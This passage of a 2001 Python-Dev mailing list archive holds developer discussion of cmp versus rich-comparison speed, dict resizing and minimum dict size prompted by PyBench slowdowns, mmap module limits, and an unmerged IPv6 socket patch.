   non-dict string case anyway (where it succeeded only 1 in 20
   times).
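Point 1 can be checked with a small Python model. The helper below emulates a three-way `cmp()` on top of rich comparisons by trying `==`, then `<`, then `>`, which is the probing order implied above; `cmp_via_rich` and `CountingStr` are hypothetical names for this sketch, not CPython internals.

```python
class CountingStr:
    """Wraps a string and counts every rich comparison made on it."""
    calls = 0

    def __init__(self, s):
        self.s = s

    def __eq__(self, other):
        CountingStr.calls += 1
        return self.s == other.s

    def __lt__(self, other):
        CountingStr.calls += 1
        return self.s < other.s

    def __gt__(self, other):
        CountingStr.calls += 1
        return self.s > other.s


def cmp_via_rich(a, b):
    """Emulate a three-way compare using only rich comparisons."""
    if a == b:
        return 0
    if a < b:
        return -1
    if a > b:
        return 1
    raise TypeError("objects are not totally ordered")


for x, y in [("spam", "spam"), ("eggs", "spam"), ("spam", "eggs")]:
    CountingStr.calls = 0
    result = cmp_via_rich(CountingStr(x), CountingStr(y))
    print(result, CountingStr.calls)
# prints "0 1", then "-1 2", then "1 3"
```

The equal case, the only one that costs a single comparison, is exactly the outcome Tim expects to be rarest when cmp() is applied to strings.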

#2 is a special case that can be special-cased to death, but #1 likely
applies to code using cmp() for comparisons of objects of any type, and
that's the primary reason I've resisted adding richcmps to the
heavily-compared types (variously string, int, float, long, and type
objects).  It's also true that "a fast path" shouldn't have to endure
wading thru multiple gimmicks (kinda defeats the idea of "fast" <wink>), so
the instant *one* heavily-compared basic type grows a richcmp (there are 0
such today), all should.

So that's what I'll aim at.


From guido at digicool.com  Thu May 17 20:18:27 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 17 May 2001 14:18:27 -0400
Subject: [Python-Dev] IPv6
Message-ID: <200105171818.f4HIIRv12891@odiug.digicool.com>

What's our IPv6 story?  I recall that someone once sent me patches,
but they didn't work for me.  Is it time to try again?  In certain
circles IPv6 support in Python would be enough to switch programming
languages... :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From martin at loewis.home.cs.tu-berlin.de  Thu May 17 21:45:29 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Thu, 17 May 2001 21:45:29 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCIENEKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCIENEKCAA.tim.one@home.com>
Message-ID: <200105171945.f4HJjTj01942@mira.informatik.hu-berlin.de>

> 1. Code using cmp(string1, string2) will clearly run significantly
>    slower, calling string comparison 1 (when == obtains), 2 (when <
>    obtains), or 3 (when > obtains) times instead of always once only.

I'd like to question the rationale behind this procedure. If a type
has both tp_compare and tp_richcompare, and the application is
performing cmp(o1, o2): Why is it then a good thing to emulate three-way
compare using rich compare?

I just changed the order in do_cmp to the following, which IMO is more correct:

	if (v->ob_type == w->ob_type
	    && (f = v->ob_type->tp_compare) != NULL)
		return (*f)(v, w);
	c = try_rich_to_3way_compare(v, w);
	if (c < 2)
		return c;
	c = try_3way_compare(v, w);
	if (c < 2)
		return c;
	return default_3way_compare(v, w);

With that, I got only a single failure in the test suite:
test_userlist fails with

exceptions.RuntimeError: UserList.__cmp__() is obsolete

Tim thinks this is a bug in UserList, since __cmp__ is not obsolete; I
agree.

According to the CVS log, this implementation of do_cmp was installed
in object.c 2.105, by gvanrossum, on 2001/01/17. What was the specific
rationale for doing do_cmp in that order?
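The effect of the do_cmp reordering above can be modelled in Python. In this sketch `compare3` is a hypothetical stand-in for a type's `tp_compare` slot, and `do_cmp` only loosely mirrors the C function (it omits the `try_3way_compare` and `default_3way_compare` fallbacks and assumes a total ordering): when both operands share a type with a native three-way compare, a single call settles the result.

```python
class Key:
    """Toy type with both a native three-way compare and rich comparisons."""
    calls = 0

    def __init__(self, v):
        self.v = v

    def compare3(self, other):  # hypothetical stand-in for tp_compare
        Key.calls += 1
        return (self.v > other.v) - (self.v < other.v)

    def __eq__(self, other):
        Key.calls += 1
        return self.v == other.v

    def __lt__(self, other):
        Key.calls += 1
        return self.v < other.v


def do_cmp(v, w):
    """Prefer a same-type native 3-way compare; else emulate via rich ops."""
    f = getattr(type(v), "compare3", None)
    if type(v) is type(w) and f is not None:
        return f(v, w)
    # Fallback: rich-comparison emulation (assumes a total ordering).
    if v == w:
        return 0
    return -1 if v < w else 1


for a, b in [(1, 1), (1, 2), (2, 1)]:
    Key.calls = 0
    print(do_cmp(Key(a), Key(b)), Key.calls)
# prints "0 1", then "-1 1", then "1 1"
```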

Regards,
Martin


From tim at digicool.com  Fri May 18 00:55:19 2001
From: tim at digicool.com (Tim Peters)
Date: Thu, 17 May 2001 18:55:19 -0400
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
Message-ID: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com>

The worst percentage hit in both MAL's and Jeremy's pybench run was (here
showing Jeremy's numbers, cuz I doubt anyone could reproduce MAL's <wink>):

        DictCreation:      87.80 ms    2.93 us  +115.72%

Assorted things do not account for it:  the new overhead of linking and
unlinking dicts into the gc list (at creation and destruction times) seems
to account for no more than 2%; and the overhead due to using the slower
lookdict (as opposed to lookdict_string) even less.

Jeremy cheated by running a profiler:  the true cause is that dictresize
gets called about twice as often.

Before 2.1:  *before* inserting an item, we checked to see whether the dict
was at the resize point.  If so, we resized it.  Note that this meant
PyDict_SetItem could grow a dict even if no new entry was made (and that
this was the cause of several excruciating bugs in the 2.1 release cycle,
since it meant a dict could get reshuffled merely when replacing the values
associated with existing keys).

2.1:  *after* inserting an item, and if the key was new (i.e., the dict grew
a new entry, as opposed to just replacing the value associated with an
existing key), and the dict is at the resize point, we resize it.

Now the DictCreation test overwhelmingly creates dicts of size exactly 3.
The dict resizes from empty to capacity 4 on the way to gaining 2 entries.
When adding the third:

Before 2.1:  2 < (2/3)*4 == 2 2/3, so the dict is not resized and ends up
remaining a capacity-4 dict with 3 slots full.  This actually violates a
documented dict invariant (i.e., that dicts are never more than 2/3 full).

2.1:  The third item added is a new item, and 3 > (2/3)*4 == 2 2/3, so we
*do* resize it, and the dict ends up with 3 of 8 slots full.

I've got no interest in trying to restore the old behavior.  A compromise
may be to boost the minimum size of a non-empty dict from 4 to 8.  As is,
the only non-empty dicts that can get away with using the current minimum
size of 4 have no more than 2 elements.  The question is whether such tiny
non-empty dicts are common enough to make everyone else pay for "an extra"
resize.
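The arithmetic above can be replayed with a toy model that counts only resizes. It is a simplification, not dictobject.c: all inserted keys are assumed distinct, a "resize" just allocates the minimum table or doubles it, the 2/3 threshold is written as `used * 3 >= capacity * 2`, and an empty dict starts with capacity 0.

```python
MINSIZE = 4

def grow(capacity, minsize):
    # Simplification: allocate the minimum table, or double the current one.
    return max(minsize, capacity * 2)

def resizes_pre21(n_items, minsize=MINSIZE):
    """Pre-2.1 rule: check the 2/3 point *before* every insertion."""
    capacity = used = resizes = 0
    for _ in range(n_items):
        if used * 3 >= capacity * 2:
            capacity, resizes = grow(capacity, minsize), resizes + 1
        used += 1
    return resizes, used, capacity

def resizes_21(n_items, minsize=MINSIZE):
    """2.1 rule: check the 2/3 point *after* each new key is added."""
    capacity = used = resizes = 0
    for _ in range(n_items):
        if capacity == 0:  # the first key needs a table to go into
            capacity, resizes = grow(capacity, minsize), resizes + 1
        used += 1
        if used * 3 >= capacity * 2:
            capacity, resizes = grow(capacity, minsize), resizes + 1
    return resizes, used, capacity

print(resizes_pre21(3))          # -> (1, 3, 4): 3 of 4 slots full
print(resizes_21(3))             # -> (2, 3, 8): 3 of 8 slots full
print(resizes_21(3, minsize=8))  # -> (1, 3, 8): the minimum-size-8 compromise
```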

go-ahead-just-*try*-to-prove-your-answer<wink>-ly y'rs  - tim


From skip at pobox.com  Fri May 18 01:21:50 2001
From: skip at pobox.com (skip at pobox.com)
Date: Thu, 17 May 2001 18:21:50 -0500
Subject: [Python-Dev] IPv6
In-Reply-To: <200105171818.f4HIIRv12891@odiug.digicool.com>
References: <200105171818.f4HIIRv12891@odiug.digicool.com>
Message-ID: <15108.23822.538016.564151@beluga.mojam.com>

    Guido> In certain circles IPv6 support in Python would be enough to
    Guido> switch programming languages... :-)

Sounds like someone has caught the scent of world domination... ;-)

S


From jeremy at digicool.com  Thu May 17 20:39:07 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Thu, 17 May 2001 14:39:07 -0400 (EDT)
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com>
References: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com>
Message-ID: <15108.6859.810306.811326@slothrop.digicool.com>

Another option is to change the benchmark to put one more item in the
dict.  Then the same number of resizes would occur with both versions
of Python.

Jeremy


From tim.one at home.com  Fri May 18 02:08:13 2001
From: tim.one at home.com (Tim Peters)
Date: Thu, 17 May 2001 20:08:13 -0400
Subject: [Python-Dev] mmap module
In-Reply-To: <3B03E6B1.A19F6594@STScI.Edu>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEOKKCAA.tim.one@home.com>

[Paul Barrett]
> In the CVS log of the mmapmodule.c, Tim Peters says:
>
> "The code really needs to be rethought from scratch (not by me, though
> ...)."

That was in specific reference to the code I changed, in mmap_find_method.
The difficulty is that mmap is great for "large files", but the code before
my change used a C int for the starting offset and also for the return value;
I boosted those to a C long, which covers 63 bits on 64-bit Linux boxes, but
doesn't help 64-bit Windows at all (where a C long remains 4 bytes).  The
mmap_object struct uses size_t to declare the relevant members, which is
possibly better still than C long, but may still leave platform capabilities
out of reach for large files (e.g., "even Win95" *allows* specifying 64-bit
offsets when creating a mapped file view).  C is a friggin' mess here, and
Python's PyArg_ParseTuple() and Py_BuildValue() don't cater to the full range
of C integral types anyway.  In other words, if this code is ever to reach
its full potential, it "really needs to be rethought from scratch".

> Well, I might be the person to do the rethinking, but I'd first like
> to know what Tim has in mind.

Nothing that you did <wink>.

> I've been playing around with this module lately and tend to agree
> that some enhancements could be made, particularly to prevent "bus
> errors" and "segmentation faults".

When you get one of those, it's a bug in Python!

> The ability to have offsets into a file that are not multiples of the
> system pagesize would also be nice.

It's OS-specific.  Python should grow warts to protect against it on the OSes
that care.
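Later versions of Python's `mmap` module did grow an `offset` argument, but it must be a multiple of `mmap.ALLOCATIONGRANULARITY` (the page size on Unix; typically 64 KiB on Windows). A sketch of hiding that restriction from the caller by aligning the offset down and slicing off the extra bytes; `read_at` is a hypothetical helper, and it assumes the file is at least `offset + length` bytes long.

```python
import mmap

def read_at(path, offset, length):
    """Return `length` bytes starting at an arbitrary `offset` via mmap.

    The mapping starts at the nearest allocation-granularity boundary at
    or below `offset`; the leading bytes before `offset` are sliced off.
    """
    gran = mmap.ALLOCATIONGRANULARITY
    aligned = offset - offset % gran  # round down to a legal mmap offset
    delta = offset - aligned          # distance from map start to target
    with open(path, "rb") as f:
        with mmap.mmap(f.fileno(), delta + length,
                       access=mmap.ACCESS_READ, offset=aligned) as m:
            return m[delta:delta + length]
```

Keyword arguments are used for `access` and `offset` because the positional signatures of `mmap.mmap` differ between Unix and Windows.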

> I'd be willing to submit a PEP on a new mmapmodule, once I know what
> others would like.

Hard to say.  This has the potential to become Python's next thread
subsystem, i.e. an endless and ultimately hopeless x-platform nightmare.  If
you do write a PEP, I vote to say that we'll cover Windows and Linux (and
maybe Mac OS X?) out of the box, but any other platform is at your own risk
(it doesn't really help if somebody pops up volunteering to support a
minority platform, because they eventually go away, their code stops working,
and it never gets fixed -- so it's use-at-your-own-risk in reality
regardless).


From tim.one at home.com  Fri May 18 02:29:18 2001
From: tim.one at home.com (Tim Peters)
Date: Thu, 17 May 2001 20:29:18 -0400
Subject: [Python-Dev] IPv6
In-Reply-To: <200105171818.f4HIIRv12891@odiug.digicool.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEOKKCAA.tim.one@home.com>

[Guido van Rossum]
> What's our IPv6 story?

Ah!  If that's version 6 of the Integer-Point alternative to Floating-Point,
I've got it covered.  Otherwise my guess is we have no story at all.

> I recall that someone once sent me patches, but they didn't work for me.

Try recompiling with -DLONG_BIT=33.

> Is it time to try again?  In certain circles IPv6 support in Python
> would be enough to switch programming languages... :-)

Floating-point is *that* bad?!

ever-helpful-ly y'rs  - tim


From jeremy at digicool.com  Fri May 18 00:16:15 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Thu, 17 May 2001 18:16:15 -0400 (EDT)
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com>
References: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com>
Message-ID: <15108.19887.534514.864376@slothrop.digicool.com>

>>>>> "TP" == Tim Peters <tim at digicool.com> writes:

  TP> I've got no interest in trying to restore the old behavior.  A
  TP> compromise may be to boost the minimum size of a non-empty dict
  TP> from 4 to 8.  As is, the only non-empty dicts that can get away
  TP> with using the current minimum size of 4 have no more than 2
  TP> elements.  The question is whether such tiny non-empty dicts are
  TP> common enough to make everyone else pay for "an extra" resize.

I also did a profile run on CreateInstances, which has a difference of
+55.54% on my machine.  It's basically the same story.  The instance
dictionary is getting resized more often with Python 2.1+ than it did
with Python 1.5.2.  I wouldn't be surprised if several more tests are
showing a slowdown with the same cause.

So boosting the minimum size sounds like a good thing.

Jeremy


From tim.one at home.com  Fri May 18 05:26:52 2001
From: tim.one at home.com (Tim Peters)
Date: Thu, 17 May 2001 23:26:52 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4
In-Reply-To: <005701c0dd38$2f417560$0900a8c0@spiff>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEOOKCAA.tim.one@home.com>

[/F]
> more info here:
>
> http://home.rica.net/alphae/419coal/index.htm
>
>     "A Five Billion US$ (as of 1996, much more now) worldwide
>     Scam which has run since the early 1980's under Successive
>     Governments of Nigeria.
>
>     "The Nigerian Scam is, according to published reports, the
>     Third to Fifth largest industry in Nigeria."

Most interesting to me is that the US Post Office is upset about this:

    http://www.usps.gov/websites/depart/inspect/pressrel.htm

They don't seem to care so much that people are getting scammed, but that the
letters mailed from Nigeria to advance the fee-extorting phase of the scam
often use counterfeit postage!  Where else but here

    http://www.usps.gov/websites/depart/inspect/metercap.htm

could you learn that "Postage meters are not used in Nigeria -- therefore,
all postage meter impressions on Nigerian mail are counterfeit!"?

governments-are-mostly-insane-ly y'rs  - tim


From martin at loewis.home.cs.tu-berlin.de  Fri May 18 06:45:21 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Fri, 18 May 2001 06:45:21 +0200
Subject: [Python-Dev] IPv6
References: <oqbsosgh94.fsf@lin2.sram.qc.ca>
Message-ID: <200105180445.f4I4jL101178@mira.informatik.hu-berlin.de>

> What's our IPv6 story?  I recall that someone once sent me patches,
> but they didn't work for me.  Is it time to try again?  In certain
> circles IPv6 support in Python would be enough to switch programming
> languages... :-)

It's still on SF,

http://sourceforge.net/tracker/index.php?func=detail&aid=401196&group_id=5470&atid=305470

There are three problems with that patch, AFAICT:

1. It is too large for any individual to review in one chunk.
2. It gets quickly outdated.
3. It touches core aspects of the socket handling that are IMO better
   untouched. I don't know whether the generalization proposed there
   is necessary to support IPv6 reasonably - the author certainly feels
   it is.

To integrate the patch, I would propose to split it into smaller
parts, and submit and review them one-by-one. The first patch should
deal only with autoconf stuff, so that the proper #defines are in
config.h (although they would not be used right away). The second
patch should be a tar file of all new files (the patch on SF actually
misses some files). The third patch should include changes to the C
modules, and the last one changes to the standard library modules.

For that procedure to work, we need cooperation from the
submitter. For that, we probably need to indicate that we are really
interested in his work, and will work with him to integrate it into
Python. So far, his impression must be that nobody is interested - the
patch has been sitting there since 2000-08-16, making it the oldest open
patch.

Undoubtedly, integrating this piece of work will result in various
problems with Python CVS: it won't build anymore on "funny machines"
(like Windows), and it might even crash on code that used to work just
fine. This prediction is not based on the actual content of the patch,
merely on its size, and the fact that IPv6 support is experimental on
many systems. So we'd also need a BDFL pronouncement that we really
really want this, and that anybody running into problems should either
help fix them, or stay away from CVS while it is being integrated.

Regards,
Martin


From tim at digicool.com  Fri May 18 09:17:07 2001
From: tim at digicool.com (Tim Peters)
Date: Fri, 18 May 2001 03:17:07 -0400
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <15108.19887.534514.864376@slothrop.digicool.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEPCKCAA.tim@digicool.com>

[Jeremy]
> I also did a profile run on CreateInstances, which has a difference of
> +55.54% on my machine.  It's basically the same story.  The instance
> dictionary is getting resized more often with Python 2.1+ than it did
> with Python 1.5.2.  I wouldn't be surprised if several more tests are
> showing a slowdown with the same cause.
>
> So boosting the minimum size sounds like a good thing.

I don't know.  PyBench is great for showing that *something* changed, but
it's got even less claim to "typical use" than pystone.

I don't know that the test suite is better in that respect, but it's got much
more variety and everyone has it <wink>.  I stuffed code in dict_dealloc() to
record the ma_fill of each dict on its way to the grave (ma_fill == number of
non-virgin slots).  Across the test suite, here's the ranking, from most to
least popular fill:

  count    fill %total  cumulative %
 ------    ---- ------  ------------
 146321       1  53.30  53.30
  38200       0  13.91  67.21
  32616       2  11.88  79.09
  29648       3  10.80  89.89
   9884       5   3.60  93.49
   5423       4   1.98  95.47
   2428       6   0.88  96.35
   2016       8   0.73  97.08
   1179       7   0.43  97.51
    904       9   0.33  97.84
    709     103   0.26  98.10
    554      10   0.20  98.30
    513      13   0.19  98.49
    459      12   0.17  98.66
    447      11   0.16  98.82
    364      14   0.13  98.95
    233      15   0.08  99.04
    231      16   0.08  99.12
    193      18   0.07  99.19
    180      17   0.07  99.26
    122      19   0.04  99.30
    107      30   0.04  99.34
    105      21   0.04  99.38
     93      22   0.03  99.41
     93      20   0.03  99.45
     86     256   0.03  99.48
     82      23   0.03  99.51
     80      26   0.03  99.54
     74      24   0.03  99.56
     69      27   0.03  99.59
     64      25   0.02  99.61
     60      29   0.02  99.63
     49      28   0.02  99.65
     44      34   0.02  99.67
     33      32   0.01  99.68
     28      31   0.01  99.69
     27      37   0.01  99.70
     27      33   0.01  99.71
     26      35   0.01  99.72
     24      36   0.01  99.73
     23      39   0.01  99.74
     23      38   0.01  99.75
     21     128   0.01  99.75
     19      44   0.01  99.76
     19      40   0.01  99.77
     17      46   0.01  99.77
     16      48   0.01  99.78
     15      47   0.01  99.78
     14      50   0.01  99.79
     14      42   0.01  99.79

There are many more sizes, but I cut off the display here when they got too
rare to round to 1% of 1% of the total count.

Boosting the first non-empty size to 8 would allow 93+% of all dicts to get
away with at most one resize (a dict of size 8 is enough for a fill of 5, but
not 6).  OTOH, the current first non-empty size of 4 is enough for 79% of all
dicts (enough for a fill of 2, but not 3).  If oodles of those tiny dicts are
alive *at the same time*, it would be quite a waste of space to force the
non-empty ones to carry 8 slots.  OTOH, if those small dicts are due to
things like building one- or two-element keyword argument dicts, their
lifetimes rarely overlap.
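The "at most one resize" arithmetic can be checked with a small model. This is a sketch under stated assumptions, not dictobject.c: an empty dict starts with no table, its first insertion allocates `minsize` slots, every later resize doubles the size, and (as the fill figures above imply) a table of `size` slots can hold `fill` non-virgin slots only while `fill*3 < size*2`. The function names are hypothetical.

```c
#include <assert.h>

/* Current 2/3 rule (assumed form): a table of `size` slots can hold
 * `fill` non-virgin slots without resizing only while fill*3 < size*2. */
static int fits_two_thirds(long fill, long size)
{
    return fill * 3 < size * 2;
}

/* Count the resizes a dict goes through while growing to `fill`,
 * counting the initial allocation of `minsize` slots as the first one.
 * Because fits_two_thirds() is monotone in fill, growing one item at a
 * time passes through exactly the sizes this loop visits. */
static int resizes_needed(long fill, long minsize)
{
    long size = 0;              /* an empty dict has no table yet */
    int resizes = 0;

    assert(fill >= 0 && minsize > 0);
    if (fill == 0)
        return 0;
    while (!fits_two_thirds(fill, size)) {
        size = (size == 0) ? minsize : size * 2;
        resizes++;
    }
    return resizes;
}
```

Under this model, with a minimum size of 4, fills 3 through 5 pay for two resizes (0 to 4 to 8); with a minimum size of 8 they pay for one.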

A more aggressive idea is to allow denser dicts, by allowing them to become
no more than 75% full.  That is, change the resize test from

    mp->ma_fill*3 >= mp->ma_size*2

to

    mp->ma_fill*4 > mp->ma_size*3

That would allow the 10.8% of real(er) life dicts with fill 3 to continue
living in dicts with 4 slots, and allow about 90% of all dicts to get away
with no more than one resize.  The downside is that boosting the max load
factor from 2/3 to 3/4 yields, "in theory", and for a dict hugging the limit,
a small boost in the expected # of compares.  But the "theory" is for random
hash functions with "uniform probing" (tech term that does *not* mean linear
probing), and Python's hash functions often aren't random at all, while AFAIK
no rigorous analysis of its probing strategy exists.
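To make the proposed change concrete, here is a sketch of the two resize tests side by side. It assumes, as the fill figures above suggest, that each test is applied to the fill the table would have after an insertion. `max_fill` is a hypothetical helper that finds the largest fill a table of a given size can carry under each rule.

```c
#include <assert.h>

/* Current rule: resize once fill reaches 2/3 of size. */
static int needs_resize_2_3(long fill, long size)
{
    return fill * 3 >= size * 2;
}

/* Proposed rule: resize only once fill exceeds 3/4 of size. */
static int needs_resize_3_4(long fill, long size)
{
    return fill * 4 > size * 3;
}

/* Largest fill a table of `size` slots can hold before `needs_resize`
 * reports that it must grow. */
static long max_fill(long size, int (*needs_resize)(long, long))
{
    long fill = 0;

    assert(size > 0);
    while (!needs_resize(fill + 1, size))
        fill++;
    return fill;
}
```

For 4-slot tables this gives the 2 versus 3 difference Tim describes; for 8 slots it is 5 versus 6, and for 16 slots 10 versus 12.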

So, plenty of arbitrary data there upon which to flip a coin <wink>.


From mal at lemburg.com  Fri May 18 09:26:36 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 18 May 2001 09:26:36 +0200
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
References: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com> <15108.19887.534514.864376@slothrop.digicool.com>
Message-ID: <3B04CEAC.57251CD7@lemburg.com>

Jeremy Hylton wrote:
> 
> >>>>> "TP" == Tim Peters <tim at digicool.com> writes:
> 
>   TP> I've got no interest in trying to restore the old behavior.  A
>   TP> compromise may be to boost the minimum size of a non-empty dict
>   TP> from 4 to 8.  As is, the only non-empty dicts that can get away
>   TP> with using the current minimum size of 4 have no more than 2
>   TP> elements.  The question is whether such tiny non-empty dicts are
>   TP> common enough to make everyone else pay for "an extra" resize.
> 
> I also did a profile run on CreateInstances, which has a difference of
> +55.54% on my machine.  It's basically the same story.  The instance
> dictionary is getting resized more often with Python 2.1+ than it did
> with Python 1.5.2.  I wouldn't be surprised if several more tests are
> showing a slowdown with the same cause.
> 
> So boosting the minimum size sounds like a good thing.

FYI, I have a patch which inlines small dictionaries directly
into the type object (rather than using malloc to allocate
the slot buffer).

I've experimented with the minimal size a lot and found that
setting it to 8 slots gives the best performance/memory tradeoff.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From tim at digicool.com  Fri May 18 10:32:39 2001
From: tim at digicool.com (Tim Peters)
Date: Fri, 18 May 2001 04:32:39 -0400
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <3B04CEAC.57251CD7@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com>

[MAL]
> FYI, I have a patch which inlines small dictionaries directly
> into the type object

You don't mean that, but how about uploading the patch to SF anyway?  Assign
it to me and I'll dig into it.

> ...
> I've experimented with the minimal size a lot and found that
> setting it to 8 slots gives the best performance/memory tradeoff.

Having done just a couple rounds of instrumented runs across various apps, I
was moving to that conclusion too.  Also that "small" dicts are so common
that avoiding the "extra" malloc would be a nice win for them, and that large
dicts are rare enough and resizing expensive enough anyway that the new cost
of doing a two-headed allocation strategy would be lost in the noise.  IOW,
I'm inclined to believe that everything you say your patch does is Good For
Python, and Guido is so sympathetic to my lack of sleep lately that I bet
he'll let me slip in one uglification without scowling <wink>.


From mal at lemburg.com  Fri May 18 13:36:28 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 18 May 2001 13:36:28 +0200
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
References: <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com>
Message-ID: <3B05093C.8248AE96@lemburg.com>

Tim Peters wrote:
> 
> [MAL]
> > FYI, I have a patch which inlines small dictionaries directly
> > into the type object
> 
> You don't mean that, but how about uploading the patch to SF anyway?  Assign
> it to me and I'll dig into it.

Right, I meant the dict object... (the "not enough coffee" thingie
again ;-)
 
> > ...
> > I've experimented with the minimal size a lot and found that
> > setting it to 8 slots gives the best performance/memory tradeoff.
> 
> Having done just a couple rounds of instrumented runs across various apps, I
> was moving to that conclusion too.  Also that "small" dicts are so common
> that avoiding the "extra" malloc would be a nice win for them, and that large
> dicts are rare enough and resizing expensive enough anyway that the new cost
> of doing a two-headed allocation strategy would be lost in the noise.  IOW,
> I'm inclined to believe that everything you say your patch does is Good For
> Python, and Guido is so sympathetic to my lack of sleep lately that I bet
> he'll let me slip in one uglification without scowling <wink>.

I'll see if I find time today to rework the patch for Python CVS.
The patch is hiding in my old Python 1.5 killer patch ;-) -- which
gives more than a 50% boost on my machine, but that's another
story.

-- 
Marc-Andre Lemburg


From mal at lemburg.com  Fri May 18 13:38:39 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 18 May 2001 13:38:39 +0200
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
References: <LNBBLJKPBEHFEDALKOLCAEPCKCAA.tim@digicool.com>
Message-ID: <3B0509BF.A2F84A30@lemburg.com>

Tim Peters wrote:
> 
> [Jeremy]
> > I also did a profile run on CreateInstances, which has a difference of
> > +55.54% on my machine.  It's basically the same story.  The instance
> > dictionary is getting resized more often with Python 2.1+ than it did
> > with Python 1.5.2.  I wouldn't be surprised if several more tests are
> > showing a slowdown with the same cause.
> >
> > So boosting the minimum size sounds like a good thing.
> 
> I don't know.  PyBench is great for showing that *something* changed, but
> it's got even less claim to "typical use" than pystone.

It doesn't claim "typical use". pybench is aimed at finding
performance issues in hot spots -- there's no such thing as
a "typical program", so pybench gives you low level performance
compares for very specific tasks, e.g. dictionary creation or
for-loop performance.

I have found it to be rather successful at that. At least it gives
some good hints at where to look...
 
> I don't know that the test suite is better in that respect, but it's got much
> more variety and everyone has it <wink>.  I stuffed code in dict_dealloc() to
> record the ma_fill of each dict on its way to the grave (ma_fill == number of
> non-virgin slots).  Across the test suite, here's the ranking, from most to
> least popular fill:
> 
>   count    fill %total  cumulative %
>  ------    ---- ------  ------------
>  146321       1  53.30  53.30
>   38200       0  13.91  67.21
>   32616       2  11.88  79.09
>   29648       3  10.80  89.89
>    9884       5   3.60  93.49
>    5423       4   1.98  95.47
>    2428       6   0.88  96.35
>    2016       8   0.73  97.08
>    1179       7   0.43  97.51
>     904       9   0.33  97.84
>     709     103   0.26  98.10
>     554      10   0.20  98.30
>     513      13   0.19  98.49
>     459      12   0.17  98.66
>     447      11   0.16  98.82
>     364      14   0.13  98.95
>     233      15   0.08  99.04
>     231      16   0.08  99.12
>     193      18   0.07  99.19
>     180      17   0.07  99.26
>     122      19   0.04  99.30
>     107      30   0.04  99.34
>     105      21   0.04  99.38
>      93      22   0.03  99.41
>      93      20   0.03  99.45
>      86     256   0.03  99.48
>      82      23   0.03  99.51
>      80      26   0.03  99.54
>      74      24   0.03  99.56
>      69      27   0.03  99.59
>      64      25   0.02  99.61
>      60      29   0.02  99.63
>      49      28   0.02  99.65
>      44      34   0.02  99.67
>      33      32   0.01  99.68
>      28      31   0.01  99.69
>      27      37   0.01  99.70
>      27      33   0.01  99.71
>      26      35   0.01  99.72
>      24      36   0.01  99.73
>      23      39   0.01  99.74
>      23      38   0.01  99.75
>      21     128   0.01  99.75
>      19      44   0.01  99.76
>      19      40   0.01  99.77
>      17      46   0.01  99.77
>      16      48   0.01  99.78
>      15      47   0.01  99.78
>      14      50   0.01  99.79
>      14      42   0.01  99.79
> 
> There are many more sizes, but I cut off the display here when they got too
> rare to round to 1% of 1% of the total count.
> 
> Boosting the first non-empty size to 8 would allow 93+% of all dicts to get
> away with at most one resize (a dict of size 8 is enough for a fill of 5, but
> not 6).  OTOH, the current first non-empty size of 4 is enough for 79% of all
> dicts (enough for a fill of 2, but not 3).  If oodles of those tiny dicts are
> alive *at the same time*, it would be quite a waste of space to force the
> non-empty ones to carry 8 slots.  OTOH, if those small dicts are due to
> things like building one- or two-element keyword argument dicts, their
> lifetimes rarely overlap.

I found that instance dictionaries usually stay within the 8 slot
range. You normally have a few heavyweight instances and
many lightweight ones which only have two or three attributes
in their instance dict.
 
> A more aggressive idea is to allow denser dicts, by allowing them to become
> no more than 75% full.  That is, change the resize test from
> 
>     mp->ma_fill*3 >= mp->ma_size*2
> 
> to
> 
>     mp->ma_fill*4 > mp->ma_size*3
> 
> That would allow the 10.8% of real(er) life dicts with fill 3 to continue
> living in dicts with 4 slots, and allow about 90% of all dicts to get away
> with no more than one resize.  The downside is that boosting the max load
> factor from 2/3 to 3/4 yields, "in theory", and for a dict hugging the limit,
> a small boost in the expected # of compares.  But the "theory" is for random
> hash functions with "uniform probing" (tech term that does *not* mean linear
> probing), and Python's hash functions often aren't random at all, while AFAIK
> no rigorous analysis of its probing strategy exists.
> 
> So, plenty of arbitrary data there upon which to flip a coin <wink>.

Why not make those parameters macros at the top of dictobject.c
which can then be tuned to whatever the programmer needs/wants ?!
